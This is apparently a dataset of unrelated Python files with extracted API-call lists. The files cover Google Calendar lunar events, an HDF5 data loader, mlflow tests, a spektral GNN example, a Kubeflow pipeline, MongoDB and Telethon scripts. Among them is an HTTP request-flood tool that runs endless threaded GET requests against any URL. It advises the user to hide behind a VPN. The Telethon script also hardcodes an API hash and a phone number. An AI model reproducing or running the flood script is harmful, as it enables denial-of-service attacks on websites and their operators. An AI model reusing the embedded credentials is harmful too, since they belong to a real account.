from datetime import datetime, timedelta
import requests
import os.path
import boto3
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from google.oauth2.credentials import Credentials
# If modifying these scopes, delete the file credentials.json.
SCOPES = ['https://www.googleapis.com/auth/calendar']
CREDENTIALS_FILE = 'credentials.json'
s3 = boto3.client("s3")
s3_bucket = os.environ["BUCKET"]
def create_event(event, context):
month = datetime.now().month
year = datetime.now().year
service = get_calendar_service()
phases = requests.get(f"https://www.icalendar37.net/lunar/api/?lang=fr&month={month}&year={year}").json()["phase"]
for day_number in phases:
phase = phases[day_number]["npWidget"]
day = datetime(year, month, int(day_number))
start = (day + timedelta(hours=18)).isoformat()
end = (day + timedelta(hours=18, minutes=30)).isoformat()
service.events().insert(calendarId='primary',
body={
"summary": phase,
"start": {"dateTime": start, "timeZone": 'Europe/Brussels'},
"end": {"dateTime": end, "timeZone": 'Europe/Brussels'},
}
).execute()
def get_calendar_service():
creds = None
obj = s3.get_object(Bucket=s3_bucket, Key=CREDENTIALS_FILE)
creds = Credentials.from_authorized_user_info(json.load(obj['Body']), SCOPES)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_config(
json.load(obj['Body']), SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
s3.put_object(Bucket=s3_bucket, Key=CREDENTIALS_FILE, Body=creds.to_json())
service = build('calendar', 'v3', credentials=creds)
return service
if __name__ == '__main__':
create_event("salut", "coucou")
# Create credentials file
# service = get_calendar_service()
|
[
"json.load",
"google.auth.transport.requests.Request",
"boto3.client",
"datetime.timedelta",
"googleapiclient.discovery.build",
"requests.get",
"datetime.datetime.now"
] |
[((461, 479), 'boto3.client', 'boto3.client', (['"""s3"""'], {}), "('s3')\n", (473, 479), False, 'import boto3\n'), ((2132, 2174), 'googleapiclient.discovery.build', 'build', (['"""calendar"""', '"""v3"""'], {'credentials': 'creds'}), "('calendar', 'v3', credentials=creds)\n", (2137, 2174), False, 'from googleapiclient.discovery import build\n'), ((561, 575), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (573, 575), False, 'from datetime import datetime, timedelta\n'), ((593, 607), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (605, 607), False, 'from datetime import datetime, timedelta\n'), ((1600, 1622), 'json.load', 'json.load', (["obj['Body']"], {}), "(obj['Body'])\n", (1609, 1622), False, 'import json\n'), ((664, 763), 'requests.get', 'requests.get', (['f"""https://www.icalendar37.net/lunar/api/?lang=fr&month={month}&year={year}"""'], {}), "(\n f'https://www.icalendar37.net/lunar/api/?lang=fr&month={month}&year={year}'\n )\n", (676, 763), False, 'import requests\n'), ((1805, 1814), 'google.auth.transport.requests.Request', 'Request', ([], {}), '()\n', (1812, 1814), False, 'from google.auth.transport.requests import Request\n'), ((1902, 1924), 'json.load', 'json.load', (["obj['Body']"], {}), "(obj['Body'])\n", (1911, 1924), False, 'import json\n'), ((924, 943), 'datetime.timedelta', 'timedelta', ([], {'hours': '(18)'}), '(hours=18)\n', (933, 943), False, 'from datetime import datetime, timedelta\n'), ((978, 1009), 'datetime.timedelta', 'timedelta', ([], {'hours': '(18)', 'minutes': '(30)'}), '(hours=18, minutes=30)\n', (987, 1009), False, 'from datetime import datetime, timedelta\n')]
|
__doc__ = """
Various data utilities.
"""
####################################################################
# Packages
####################################################################
import os
import h5py
import numpy as np
import pandas as pd
####################################################################
# Globals/Constants
####################################################################
PROJECT_DIR = os.path.dirname(
os.path.dirname(
os.path.realpath(__file__)))
DATA_DIR = os.path.join(PROJECT_DIR, 'data')
TRAIN_DATA_FILE = os.path.join(DATA_DIR, 'train.h5')
####################################################################
# Functions
####################################################################
def get_data(path=None):
if path:
data_set = DataSet(path)
else:
data_set = DataSet(TRAIN_DATA_FILE)
return data_set
####################################################################
# Classes
####################################################################
class DataSet(object):
"""class for dataset processing"""
def __init__(self, path=TRAIN_DATA_FILE):
self.path = path
self.data_dict = self._get_data_dict()
self.df = self._get_df()
def _get_data_dict(self):
with h5py.File(self.path,'r') as hf:
train_hf = hf.get('train')
data_dict = { hf_key: np.array(train_hf.get(hf_key))
for hf_key in train_hf.keys()}
return data_dict
def _get_df(self):
with pd.HDFStore(self.path, "r") as train:
df = train.get("train")
return df
def __repr__(self):
sets = [ "{}: {}".format(key,data_set.shape)
for key, data_set in
self.data_dict.iteritems()]
return "; ".join(sets)
def keys(self):
return self.data_dict.keys()
def get(self, key):
return self.data_dict.get(key, None)
def to_df(self):
return self.df
def get_batch(self, slice_index, batch_size, columns=None, random=False):
if random:
samples = self.df.sample(n=batch_size)
else:
num_samples = self.df.shape[0]
if (slice_index+1)*batch_size >= num_samples:
print("Slice is out of range. Taking last batch_size slice")
sample_range = (num_samples - batch_size, num_samples)
else:
sample_range = (slice_index*batch_size, (slice_index+1)*batch_size)
samples = self.df[sample_range[0] : sample_range[1]]
samples_matrix = np.array(samples.as_matrix(columns=columns)) if columns else np.array(samples.as_matrix())
return samples_matrix
def get_numpy_data(self):
df = self.df
means = []
stds = []
# Assuming column order remains consistent throughout the class
for col in df.columns:
if col not in ['y', 'timestamp', 'index', 'id']:
data = df[col].dropna().as_matrix()
means.append(np.mean(data))
stds.append(np.std(data))
col_means = np.array(means)
col_stds = np.array(stds)
# Ensure values are sorted by time
df = df.sort_values(by=['id', 'timestamp'], ascending=True)
max_seq_len_raw = 1820
# Simply mean-fill missing values for now
df = df.fillna(df.mean())
ids = np.unique(df['id'].as_matrix())
examples = []
targets = []
weights = []
for id in ids:
slice = df[df.id == id]
num_timesteps = slice.shape[0]
#y = slice['y'].as_matrix()
# Pad df to max seq len
padded = slice.reset_index().reindex(range(max_seq_len_raw),
fill_value=0)
target = padded['y'].as_matrix()
padded.drop('y', axis=1, inplace=True)
padded.drop('timestamp', axis=1, inplace=True)
padded.drop('index', axis=1, inplace=True)
padded.drop('id', axis=1, inplace=True)
example = padded.as_matrix()
examples.append(example)
targets.append(target)
weight = [1]*num_timesteps + [0]*(max_seq_len_raw - num_timesteps)
weights.append(weight)
examples = np.array(examples)
targets = np.array(targets)
weights = np.array(weights)
# Normalize the data
examples = (examples - col_means)/col_stds
# TODO: Supply these outside the function later: col_means, col_stds
return examples, targets, weights
def split_valid(self, examples, targets, weights, valid_split_ratio=0.5):
"""
Args:
valid_split_ratio: float range 0-1.; percentage of data reserved
for validation. Note that two validation sets are reserved: unique
ids are reserved entirely for validation, and, latter timesteps for
sequences used in training are also used in validation.
"""
num_ids = examples.shape[0]
valid_num = int(round(num_ids*valid_split_ratio))
examples_train_pre = examples[:-valid_num]
targets_train_pre = targets[:-valid_num]
weights_train_pre = weights[:-valid_num]
examples_valid = examples[-valid_num:]
targets_valid = targets[-valid_num:]
weights_valid = weights[-valid_num:]
examples_train = []
targets_train = []
weights_train = []
examples_train_valid = []
targets_train_valid = []
weights_train_valid = []
valid_len = 300 # Hardcoded for now
for arr1, arr2, arr3 in zip(examples_train_pre, targets_train_pre,
weights_train_pre):
examples_train.append(arr1[:-valid_len])
targets_train.append(arr2[:-valid_len])
weights_train.append(arr3[:-valid_len])
examples_train_valid.append(arr1[-valid_len:])
targets_train_valid.append(arr2[-valid_len:])
weights_train_valid.append(arr3[-valid_len:])
trainset = (np.array(examples_train), np.array(targets_train),
np.array(weights_train))
train_validset = (np.array(examples_train_valid),
np.array(targets_train_valid),
np.array(weights_train_valid))
validset = (examples_valid, targets_valid, weights_valid)
return trainset, train_validset, validset
def get_numpy_batch(self, dataset, batch_size, seq_len):
examples = []
targets = []
weights = []
#for _ in range(batch_size):
while len(targets) < batch_size:
# Sample a random id
idx = np.random.choice(range(dataset[0].shape[0]))
# Take random slice
max_seq_len = dataset[0][idx].shape[0]
assert max_seq_len >= seq_len
slice = np.random.choice(range(max_seq_len - seq_len))
# Let's just go with full length for now
w = dataset[2][idx][slice:slice+seq_len]
if np.sum(w) != len(w):
continue
examples.append(dataset[0][idx][slice:slice+seq_len])
targets.append(dataset[1][idx][slice:slice+seq_len])
weights.append(w)
return np.array(examples), np.array(targets), np.array(weights)
|
[
"h5py.File",
"pandas.HDFStore",
"numpy.sum",
"numpy.std",
"os.path.realpath",
"numpy.mean",
"numpy.array",
"os.path.join"
] |
[((545, 578), 'os.path.join', 'os.path.join', (['PROJECT_DIR', '"""data"""'], {}), "(PROJECT_DIR, 'data')\n", (557, 578), False, 'import os\n'), ((597, 631), 'os.path.join', 'os.path.join', (['DATA_DIR', '"""train.h5"""'], {}), "(DATA_DIR, 'train.h5')\n", (609, 631), False, 'import os\n'), ((505, 531), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (521, 531), False, 'import os\n'), ((3229, 3244), 'numpy.array', 'np.array', (['means'], {}), '(means)\n', (3237, 3244), True, 'import numpy as np\n'), ((3264, 3278), 'numpy.array', 'np.array', (['stds'], {}), '(stds)\n', (3272, 3278), True, 'import numpy as np\n'), ((4506, 4524), 'numpy.array', 'np.array', (['examples'], {}), '(examples)\n', (4514, 4524), True, 'import numpy as np\n'), ((4543, 4560), 'numpy.array', 'np.array', (['targets'], {}), '(targets)\n', (4551, 4560), True, 'import numpy as np\n'), ((4579, 4596), 'numpy.array', 'np.array', (['weights'], {}), '(weights)\n', (4587, 4596), True, 'import numpy as np\n'), ((1335, 1360), 'h5py.File', 'h5py.File', (['self.path', '"""r"""'], {}), "(self.path, 'r')\n", (1344, 1360), False, 'import h5py\n'), ((1596, 1623), 'pandas.HDFStore', 'pd.HDFStore', (['self.path', '"""r"""'], {}), "(self.path, 'r')\n", (1607, 1623), True, 'import pandas as pd\n'), ((6397, 6421), 'numpy.array', 'np.array', (['examples_train'], {}), '(examples_train)\n', (6405, 6421), True, 'import numpy as np\n'), ((6423, 6446), 'numpy.array', 'np.array', (['targets_train'], {}), '(targets_train)\n', (6431, 6446), True, 'import numpy as np\n'), ((6500, 6523), 'numpy.array', 'np.array', (['weights_train'], {}), '(weights_train)\n', (6508, 6523), True, 'import numpy as np\n'), ((6551, 6581), 'numpy.array', 'np.array', (['examples_train_valid'], {}), '(examples_train_valid)\n', (6559, 6581), True, 'import numpy as np\n'), ((6631, 6660), 'numpy.array', 'np.array', (['targets_train_valid'], {}), '(targets_train_valid)\n', (6639, 6660), True, 'import numpy as np\n'), ((6710, 6739), 'numpy.array', 'np.array', (['weights_train_valid'], {}), '(weights_train_valid)\n', (6718, 6739), True, 'import numpy as np\n'), ((7756, 7774), 'numpy.array', 'np.array', (['examples'], {}), '(examples)\n', (7764, 7774), True, 'import numpy as np\n'), ((7776, 7793), 'numpy.array', 'np.array', (['targets'], {}), '(targets)\n', (7784, 7793), True, 'import numpy as np\n'), ((7795, 7812), 'numpy.array', 'np.array', (['weights'], {}), '(weights)\n', (7803, 7812), True, 'import numpy as np\n'), ((7520, 7529), 'numpy.sum', 'np.sum', (['w'], {}), '(w)\n', (7526, 7529), True, 'import numpy as np\n'), ((3147, 3160), 'numpy.mean', 'np.mean', (['data'], {}), '(data)\n', (3154, 3160), True, 'import numpy as np\n'), ((3190, 3202), 'numpy.std', 'np.std', (['data'], {}), '(data)\n', (3196, 3202), True, 'import numpy as np\n')]
|
from click.testing import CliRunner
from unittest import mock
import numpy as np
import os
import pandas as pd
import shutil
import tempfile
import textwrap
from mlflow import experiments
from mlflow.runs import list_run
import mlflow
def test_list_run():
with mlflow.start_run(run_name="apple"):
pass
result = CliRunner().invoke(list_run, ["--experiment-id", "0"])
assert "apple" in result.output
def test_list_run_experiment_id_required():
result = CliRunner().invoke(list_run, [])
assert "Missing option '--experiment-id'" in result.output
def test_csv_generation():
with mock.patch("mlflow.experiments.fluent.search_runs") as mock_search_runs:
mock_search_runs.return_value = pd.DataFrame(
{
"run_id": np.array(["all_set", "with_none", "with_nan"]),
"experiment_id": np.array([1, 1, 1]),
"param_optimizer": np.array(["Adam", None, "Adam"]),
"avg_loss": np.array([42.0, None, np.nan], dtype=np.float32),
},
columns=["run_id", "experiment_id", "param_optimizer", "avg_loss"],
)
expected_csv = textwrap.dedent(
"""\
run_id,experiment_id,param_optimizer,avg_loss
all_set,1,Adam,42.0
with_none,1,,
with_nan,1,Adam,
"""
)
tempdir = tempfile.mkdtemp()
try:
result_filename = os.path.join(tempdir, "result.csv")
CliRunner().invoke(
experiments.generate_csv_with_runs,
["--experiment-id", "1", "--filename", result_filename],
)
with open(result_filename, "r") as fd:
assert expected_csv == fd.read()
finally:
shutil.rmtree(tempdir)
|
[
"textwrap.dedent",
"mlflow.start_run",
"unittest.mock.patch",
"tempfile.mkdtemp",
"numpy.array",
"shutil.rmtree",
"click.testing.CliRunner",
"os.path.join"
] |
[((270, 304), 'mlflow.start_run', 'mlflow.start_run', ([], {'run_name': '"""apple"""'}), "(run_name='apple')\n", (286, 304), False, 'import mlflow\n'), ((616, 667), 'unittest.mock.patch', 'mock.patch', (['"""mlflow.experiments.fluent.search_runs"""'], {}), "('mlflow.experiments.fluent.search_runs')\n", (626, 667), False, 'from unittest import mock\n'), ((1160, 1330), 'textwrap.dedent', 'textwrap.dedent', (['""" run_id,experiment_id,param_optimizer,avg_loss\n all_set,1,Adam,42.0\n with_none,1,,\n with_nan,1,Adam,\n """'], {}), '(\n """ run_id,experiment_id,param_optimizer,avg_loss\n all_set,1,Adam,42.0\n with_none,1,,\n with_nan,1,Adam,\n """\n )\n', (1175, 1330), False, 'import textwrap\n'), ((1363, 1381), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (1379, 1381), False, 'import tempfile\n'), ((332, 343), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (341, 343), False, 'from click.testing import CliRunner\n'), ((482, 493), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (491, 493), False, 'from click.testing import CliRunner\n'), ((1425, 1460), 'os.path.join', 'os.path.join', (['tempdir', '"""result.csv"""'], {}), "(tempdir, 'result.csv')\n", (1437, 1460), False, 'import os\n'), ((1761, 1783), 'shutil.rmtree', 'shutil.rmtree', (['tempdir'], {}), '(tempdir)\n', (1774, 1783), False, 'import shutil\n'), ((783, 829), 'numpy.array', 'np.array', (["['all_set', 'with_none', 'with_nan']"], {}), "(['all_set', 'with_none', 'with_nan'])\n", (791, 829), True, 'import numpy as np\n'), ((864, 883), 'numpy.array', 'np.array', (['[1, 1, 1]'], {}), '([1, 1, 1])\n', (872, 883), True, 'import numpy as np\n'), ((920, 952), 'numpy.array', 'np.array', (["['Adam', None, 'Adam']"], {}), "(['Adam', None, 'Adam'])\n", (928, 952), True, 'import numpy as np\n'), ((982, 1030), 'numpy.array', 'np.array', (['[42.0, None, np.nan]'], {'dtype': 'np.float32'}), '([42.0, None, np.nan], dtype=np.float32)\n', (990, 1030), True, 'import numpy as np\n'), ((1473, 1484), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (1482, 1484), False, 'from click.testing import CliRunner\n')]
|
"""
This example implements the model from the paper
> [Design Space for Graph Neural Networks](https://arxiv.org/abs/2011.08843)<br>
> <NAME>, <NAME>, <NAME>
using the PROTEINS dataset.
The configuration at the top of the file is the best one identified in the
paper, and should work well for many different datasets without changes.
Note: the results reported in the paper are averaged over 3 random repetitions
with an 80/20 split.
"""
import numpy as np
import tensorflow as tf
from tensorflow.keras.losses import CategoricalCrossentropy
from tensorflow.keras.metrics import categorical_accuracy
from tensorflow.keras.optimizers import Adam
from spektral.data import DisjointLoader
from spektral.datasets import TUDataset
from spektral.models import GeneralGNN
physical_devices = tf.config.list_physical_devices("GPU")
if len(physical_devices) > 0:
tf.config.experimental.set_memory_growth(physical_devices[0], True)
################################################################################
# Config
################################################################################
batch_size = 32
learning_rate = 0.01
epochs = 400
################################################################################
# Load data
################################################################################
data = TUDataset("PROTEINS")
# Train/test split
np.random.shuffle(data)
split = int(0.8 * len(data))
data_tr, data_te = data[:split], data[split:]
# Data loaders
loader_tr = DisjointLoader(data_tr, batch_size=batch_size, epochs=epochs)
loader_te = DisjointLoader(data_te, batch_size=batch_size)
################################################################################
# Build model
################################################################################
model = GeneralGNN(data.n_labels, activation="softmax")
optimizer = Adam(learning_rate)
loss_fn = CategoricalCrossentropy()
################################################################################
# Fit model
################################################################################
@tf.function(input_signature=loader_tr.tf_signature(), experimental_relax_shapes=True)
def train_step(inputs, target):
with tf.GradientTape() as tape:
predictions = model(inputs, training=True)
loss = loss_fn(target, predictions) + sum(model.losses)
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
acc = tf.reduce_mean(categorical_accuracy(target, predictions))
return loss, acc
def evaluate(loader):
output = []
step = 0
while step < loader.steps_per_epoch:
step += 1
inputs, target = loader.__next__()
pred = model(inputs, training=False)
outs = (
loss_fn(target, pred),
tf.reduce_mean(categorical_accuracy(target, pred)),
len(target), # Keep track of batch size
)
output.append(outs)
if step == loader.steps_per_epoch:
output = np.array(output)
return np.average(output[:, :-1], 0, weights=output[:, -1])
epoch = step = 0
results = []
for batch in loader_tr:
step += 1
loss, acc = train_step(*batch)
results.append((loss, acc))
if step == loader_tr.steps_per_epoch:
step = 0
epoch += 1
results_te = evaluate(loader_te)
print(
"Ep. {} - Loss: {:.3f} - Acc: {:.3f} - Test loss: {:.3f} - Test acc: {:.3f}".format(
epoch, *np.mean(results, 0), *results_te
)
)
results = []
################################################################################
# Evaluate model
################################################################################
results_te = evaluate(loader_te)
print("Final results - Loss: {:.3f} - Acc: {:.3f}".format(*results_te))
|
[
"numpy.average",
"tensorflow.config.list_physical_devices",
"spektral.data.DisjointLoader",
"spektral.datasets.TUDataset",
"tensorflow.config.experimental.set_memory_growth",
"tensorflow.keras.losses.CategoricalCrossentropy",
"numpy.mean",
"tensorflow.keras.optimizers.Adam",
"tensorflow.keras.metrics.categorical_accuracy",
"numpy.array",
"spektral.models.GeneralGNN",
"tensorflow.GradientTape",
"numpy.random.shuffle"
] |
[((798, 836), 'tensorflow.config.list_physical_devices', 'tf.config.list_physical_devices', (['"""GPU"""'], {}), "('GPU')\n", (829, 836), True, 'import tensorflow as tf\n'), ((1343, 1364), 'spektral.datasets.TUDataset', 'TUDataset', (['"""PROTEINS"""'], {}), "('PROTEINS')\n", (1352, 1364), False, 'from spektral.datasets import TUDataset\n'), ((1385, 1408), 'numpy.random.shuffle', 'np.random.shuffle', (['data'], {}), '(data)\n', (1402, 1408), True, 'import numpy as np\n'), ((1512, 1573), 'spektral.data.DisjointLoader', 'DisjointLoader', (['data_tr'], {'batch_size': 'batch_size', 'epochs': 'epochs'}), '(data_tr, batch_size=batch_size, epochs=epochs)\n', (1526, 1573), False, 'from spektral.data import DisjointLoader\n'), ((1586, 1632), 'spektral.data.DisjointLoader', 'DisjointLoader', (['data_te'], {'batch_size': 'batch_size'}), '(data_te, batch_size=batch_size)\n', (1600, 1632), False, 'from spektral.data import DisjointLoader\n'), ((1818, 1865), 'spektral.models.GeneralGNN', 'GeneralGNN', (['data.n_labels'], {'activation': '"""softmax"""'}), "(data.n_labels, activation='softmax')\n", (1828, 1865), False, 'from spektral.models import GeneralGNN\n'), ((1878, 1897), 'tensorflow.keras.optimizers.Adam', 'Adam', (['learning_rate'], {}), '(learning_rate)\n', (1882, 1897), False, 'from tensorflow.keras.optimizers import Adam\n'), ((1908, 1933), 'tensorflow.keras.losses.CategoricalCrossentropy', 'CategoricalCrossentropy', ([], {}), '()\n', (1931, 1933), False, 'from tensorflow.keras.losses import CategoricalCrossentropy\n'), ((871, 938), 'tensorflow.config.experimental.set_memory_growth', 'tf.config.experimental.set_memory_growth', (['physical_devices[0]', '(True)'], {}), '(physical_devices[0], True)\n', (911, 938), True, 'import tensorflow as tf\n'), ((2238, 2255), 'tensorflow.GradientTape', 'tf.GradientTape', ([], {}), '()\n', (2253, 2255), True, 'import tensorflow as tf\n'), ((2541, 2582), 'tensorflow.keras.metrics.categorical_accuracy', 'categorical_accuracy', (['target', 'predictions'], {}), '(target, predictions)\n', (2561, 2582), False, 'from tensorflow.keras.metrics import categorical_accuracy\n'), ((3076, 3092), 'numpy.array', 'np.array', (['output'], {}), '(output)\n', (3084, 3092), True, 'import numpy as np\n'), ((3112, 3164), 'numpy.average', 'np.average', (['output[:, :-1]', '(0)'], {'weights': 'output[:, -1]'}), '(output[:, :-1], 0, weights=output[:, -1])\n', (3122, 3164), True, 'import numpy as np\n'), ((2884, 2918), 'tensorflow.keras.metrics.categorical_accuracy', 'categorical_accuracy', (['target', 'pred'], {}), '(target, pred)\n', (2904, 2918), False, 'from tensorflow.keras.metrics import categorical_accuracy\n'), ((3557, 3576), 'numpy.mean', 'np.mean', (['results', '(0)'], {}), '(results, 0)\n', (3564, 3576), True, 'import numpy as np\n')]
|
import kfp.dsl as dsl
class ObjectDict(dict):
def __getattr__(self, name):
if name in self:
return self[name]
else:
raise AttributeError("No such attribute: " + name)
@dsl.pipeline(
name='fashion mnist',
description='Train and Deploy Fashion MNIST'
)
def train_and_deploy(
download_and_preprocess="full"
):
# Step 1: download and store data in pipeline
download = dsl.ContainerOp(
name='download',
# image needs to be a compile-time string
image='docker.io/dotnetderek/download:latest',
arguments=[
download_and_preprocess
],
file_outputs={
'trainImages':'/trainImagesObjectName.txt',
'trainLabels':'/trainLabelsObjectName.txt',
'testImages':'/testImagesObjectName.txt',
'testLabels':'/testLabelsObjectName.txt'
}
)
# Step 2: normalize data between 0 and 1
preprocess = dsl.ContainerOp(
name='preprocess',
# image needs to be a compile-time string
image='docker.io/dotnetderek/preprocess:latest',
arguments=[
download.outputs['trainImages'],
download.outputs['trainLabels'],
download.outputs['testImages'],
download.outputs['testLabels'],
download_and_preprocess
],
file_outputs={
'normalizedTrainImages':'/trainImagesObjectName.txt',
'normalizedTestImages':'/testImagesObjectName.txt'
}
)
# Step 3: train a model
train = dsl.ContainerOp(
name='train',
# image needs to be a compile-time string
image='docker.io/dotnetderek/train:latest',
arguments=[
preprocess.outputs['normalizedTrainImages'],
download.outputs['trainLabels']
],
file_outputs={
'trainedModelName':'/trainedModelName.txt'
}
)
# Step 4: evaluate model
evaluate = dsl.ContainerOp(
name='evaluate',
# image needs to be a compile-time string
image='docker.io/dotnetderek/evaluate:latest',
arguments=[
preprocess.outputs['normalizedTestImages'],
download.outputs['testLabels'],
train.outputs['trainedModelName']
],
file_outputs={
}
)
if __name__ == '__main__':
import kfp.compiler as compiler
import sys
if len(sys.argv) != 2:
print("Usage: kfp_fashion_mnist pipeline-output-name")
sys.exit(-1)
filename = sys.argv[1]
compiler.Compiler().compile(train_and_deploy, filename)
|
[
"kfp.dsl.ContainerOp",
"kfp.dsl.pipeline",
"sys.exit",
"kfp.compiler.Compiler"
] |
[((193, 278), 'kfp.dsl.pipeline', 'dsl.pipeline', ([], {'name': '"""fashion mnist"""', 'description': '"""Train and Deploy Fashion MNIST"""'}), "(name='fashion mnist', description='Train and Deploy Fashion MNIST'\n )\n", (205, 278), True, 'import kfp.dsl as dsl\n'), ((400, 729), 'kfp.dsl.ContainerOp', 'dsl.ContainerOp', ([], {'name': '"""download"""', 'image': '"""docker.io/dotnetderek/download:latest"""', 'arguments': '[download_and_preprocess]', 'file_outputs': "{'trainImages': '/trainImagesObjectName.txt', 'trainLabels':\n '/trainLabelsObjectName.txt', 'testImages': '/testImagesObjectName.txt',\n 'testLabels': '/testLabelsObjectName.txt'}"}), "(name='download', image=\n 'docker.io/dotnetderek/download:latest', arguments=[\n download_and_preprocess], file_outputs={'trainImages':\n '/trainImagesObjectName.txt', 'trainLabels':\n '/trainLabelsObjectName.txt', 'testImages': '/testImagesObjectName.txt',\n 'testLabels': '/testLabelsObjectName.txt'})\n", (415, 729), True, 'import kfp.dsl as dsl\n'), ((871, 1267), 'kfp.dsl.ContainerOp', 'dsl.ContainerOp', ([], {'name': '"""preprocess"""', 'image': '"""docker.io/dotnetderek/preprocess:latest"""', 'arguments': "[download.outputs['trainImages'], download.outputs['trainLabels'], download\n .outputs['testImages'], download.outputs['testLabels'],\n download_and_preprocess]", 'file_outputs': "{'normalizedTrainImages': '/trainImagesObjectName.txt',\n 'normalizedTestImages': '/testImagesObjectName.txt'}"}), "(name='preprocess', image=\n 'docker.io/dotnetderek/preprocess:latest', arguments=[download.outputs[\n 'trainImages'], download.outputs['trainLabels'], download.outputs[\n 'testImages'], download.outputs['testLabels'], download_and_preprocess],\n file_outputs={'normalizedTrainImages': '/trainImagesObjectName.txt',\n 'normalizedTestImages': '/testImagesObjectName.txt'})\n", (886, 1267), True, 'import kfp.dsl as dsl\n'), ((1402, 1638), 'kfp.dsl.ContainerOp', 'dsl.ContainerOp', ([], {'name': '"""train"""', 'image': '"""docker.io/dotnetderek/train:latest"""', 'arguments': "[preprocess.outputs['normalizedTrainImages'], download.outputs['trainLabels']]", 'file_outputs': "{'trainedModelName': '/trainedModelName.txt'}"}), "(name='train', image='docker.io/dotnetderek/train:latest',\n arguments=[preprocess.outputs['normalizedTrainImages'], download.\n outputs['trainLabels']], file_outputs={'trainedModelName':\n '/trainedModelName.txt'})\n", (1417, 1638), True, 'import kfp.dsl as dsl\n'), ((1765, 1999), 'kfp.dsl.ContainerOp', 'dsl.ContainerOp', ([], {'name': '"""evaluate"""', 'image': '"""docker.io/dotnetderek/evaluate:latest"""', 'arguments': "[preprocess.outputs['normalizedTestImages'], download.outputs['testLabels'],\n train.outputs['trainedModelName']]", 'file_outputs': '{}'}), "(name='evaluate', image=\n 'docker.io/dotnetderek/evaluate:latest', arguments=[preprocess.outputs[\n 'normalizedTestImages'], download.outputs['testLabels'], train.outputs[\n 'trainedModelName']], file_outputs={})\n", (1780, 1999), True, 'import kfp.dsl as dsl\n'), ((2246, 2258), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (2254, 2258), False, 'import sys\n'), ((2289, 2308), 'kfp.compiler.Compiler', 'compiler.Compiler', ([], {}), '()\n', (2306, 2308), True, 'import kfp.compiler as compiler\n')]
|
import pymongo
from pymongo import MongoClient
connection = MongoClient ()
#client = MongoClient('localhost', 27017)
#The client object is thread-safe and has connection-pooling built in. If an operation fails because of a network error, ConnectionFailure is raised and the client reconnects in the background. Application code should handle this exception (recognizing that the operation failed) and then continue to execute.
# connect to the students database and the ctec121 collection
#db = connection.students.ctec121
db = connection.napp
collection = db.users
collection.find_one({"name":"name1"})
|
[
"pymongo.MongoClient"
] |
[((61, 74), 'pymongo.MongoClient', 'MongoClient', ([], {}), '()\n', (72, 74), False, 'from pymongo import MongoClient\n')]
|
from telethon.sync import TelegramClient
from telethon.sessions import StringSession
from pprint import pprint
import os
api_id = 628127
api_hash = 'db7fa09d585d6eedddd0df5973f3239b'
phone = '+8801817184338'
client = TelegramClient(phone, api_id, api_hash)
client.connect()
if not client.is_user_authorized():
client.send_code_request(phone)
client.sign_in(phone, input('Enter the code: '))
async def main():
st = ""
async for dialog in client.iter_dialogs():
try:
st1 = str(dialog.id)
st2 = st1[0]
if st2 == chr(45):
st = st + "\n" + str(dialog.id) + ',' + str(dialog.name)
except:
pass
return st
def wrt_content(st):
try:
file = os.getcwd() + "//omgroup//omgrp.txt"
fl = open(file, "w+", encoding="utf-8")
fl.write(st)
fl.close()
except:
file = os.getcwd() + "//omgrp.txt"
fl = open(file, "w+", encoding="utf-8")
fl.write(st)
fl.close()
return file
def client_run():
with client:
sx = client.loop.run_until_complete(main())
fl = wrt_content(sx)
return fl
|
[
"os.getcwd",
"telethon.sync.TelegramClient"
] |
[((218, 257), 'telethon.sync.TelegramClient', 'TelegramClient', (['phone', 'api_id', 'api_hash'], {}), '(phone, api_id, api_hash)\n', (232, 257), False, 'from telethon.sync import TelegramClient\n'), ((747, 758), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (756, 758), False, 'import os\n'), ((899, 910), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (908, 910), False, 'import os\n')]
|
#!/usr/bin/python3
import requests, threading, os, readline, optparse
from colorama import Fore
read = optparse.OptionParser()
read.add_option('-u', '--url',help="Enter Website url", dest='url')
(value, key) = read.parse_args()
url = value.url
if url is None:
print("Coded by: <NAME>")
print("github: https://github.com/abalesluke")
print("Note: i am no longer responsible for any misuse of this tool!.")
print("\nTip: before executing this code you can also use -u flag\neg.[python3 reqflood.py -u <url>]")
print("You must Use vpn when using this!, cuz this version doesnt use proxy\n")
url = input('Enter url: ')
else:
pass
count = 0
def flood():
try:
header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"}
for x in range(100):
r = requests.get(url, headers=header)
global count
count+=1
print(f'{Fore.GREEN}[{Fore.CYAN}{count}{Fore.GREEN}] {Fore.CYAN}request/s sent to: {Fore.GREEN}{url} [{Fore.MAGENTA}{r.status_code}{Fore.GREEN}]')
except KeyboardInterrupt:
exit(0)
except:
pass
threads = []
while True:
for i in range(100):
x = threading.Thread(target=flood)
x.daemon = True
threads.append(x)
for i in range(100):
threads[i].start()
for i in range(100):
threads[i].join()
|
[
"requests.get",
"threading.Thread",
"optparse.OptionParser"
] |
[((104, 127), 'optparse.OptionParser', 'optparse.OptionParser', ([], {}), '()\n', (125, 127), False, 'import requests, threading, os, readline, optparse\n'), ((1158, 1188), 'threading.Thread', 'threading.Thread', ([], {'target': 'flood'}), '(target=flood)\n', (1174, 1188), False, 'import requests, threading, os, readline, optparse\n'), ((839, 872), 'requests.get', 'requests.get', (['url'], {'headers': 'header'}), '(url, headers=header)\n', (851, 872), False, 'import requests, threading, os, readline, optparse\n')]
|
import json
import requests
from sqlalchemy import Column, Integer, String, Float, Boolean
from pprint import pprint
from sqlalchemy import create_engine
